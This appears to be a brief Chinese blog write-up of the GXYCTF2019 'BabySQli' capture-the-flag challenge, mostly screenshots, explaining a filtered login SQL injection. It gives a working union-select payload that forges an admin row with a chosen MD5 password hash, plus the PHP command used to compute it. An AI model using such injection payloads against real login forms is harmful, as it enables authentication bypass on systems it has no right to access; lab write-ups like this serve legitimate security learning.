https://buuoj.cn/challenges#[GXYCTF2019]BabySQli![BUUCTF:[GXYCTF2019]BabySQli_联合查询](https://s2.51cto.com/images/blog/202306/19154635_649007db6880125443.png?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_30,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=/resize,m_fixed,w_1184 "在这里插入图片描述")
![BUUCTF:[GXYCTF2019]BabySQli_联合查询_02](https://s2.51cto.com/images/blog/202306/19154635_649007db8913026335.png?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_30,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=/resize,m_fixed,w_1184 "在这里插入图片描述")
登陆类注入,有过滤
![BUUCTF:[GXYCTF2019]BabySQli_md5加密_03](https://s2.51cto.com/images/blog/202306/19154635_649007db9f96086568.png?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_30,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=/resize,m_fixed,w_1184 "在这里插入图片描述")
![BUUCTF:[GXYCTF2019]BabySQli_md5加密_04](https://s2.51cto.com/images/blog/202306/19154635_649007dbb70a52833.png?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_30,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=/resize,m_fixed,w_1184 "在这里插入图片描述")
这是一段base32解码后是base64再解一次得到
select * from user where username = '$name'Trick
- 使用联合查询构造虚拟查询记录进行登录
![BUUCTF:[GXYCTF2019]BabySQli_联合查询_05](https://s2.51cto.com/images/blog/202306/19154635_649007dbce4d422020.png?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_30,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=/resize,m_fixed,w_1184 "在这里插入图片描述")
这里有个小坑,原题应该是有对密码进行了md5加密后存储的,但是这里没有提示
PS C:\Users\Administrator> php -r "var_dump(md5('mochu7'));"
string(32) "874a0300d72a3676c4413ce52454eff7"name=mochu7'union select 1,'admin','874a0300d72a3676c4413ce52454eff7'#&pw=mochu7![BUUCTF:[GXYCTF2019]BabySQli_md5加密_06](https://s2.51cto.com/images/blog/202306/19154635_649007dbec3eb86100.png?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_30,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=/resize,m_fixed,w_1184 "在这里插入图片描述")
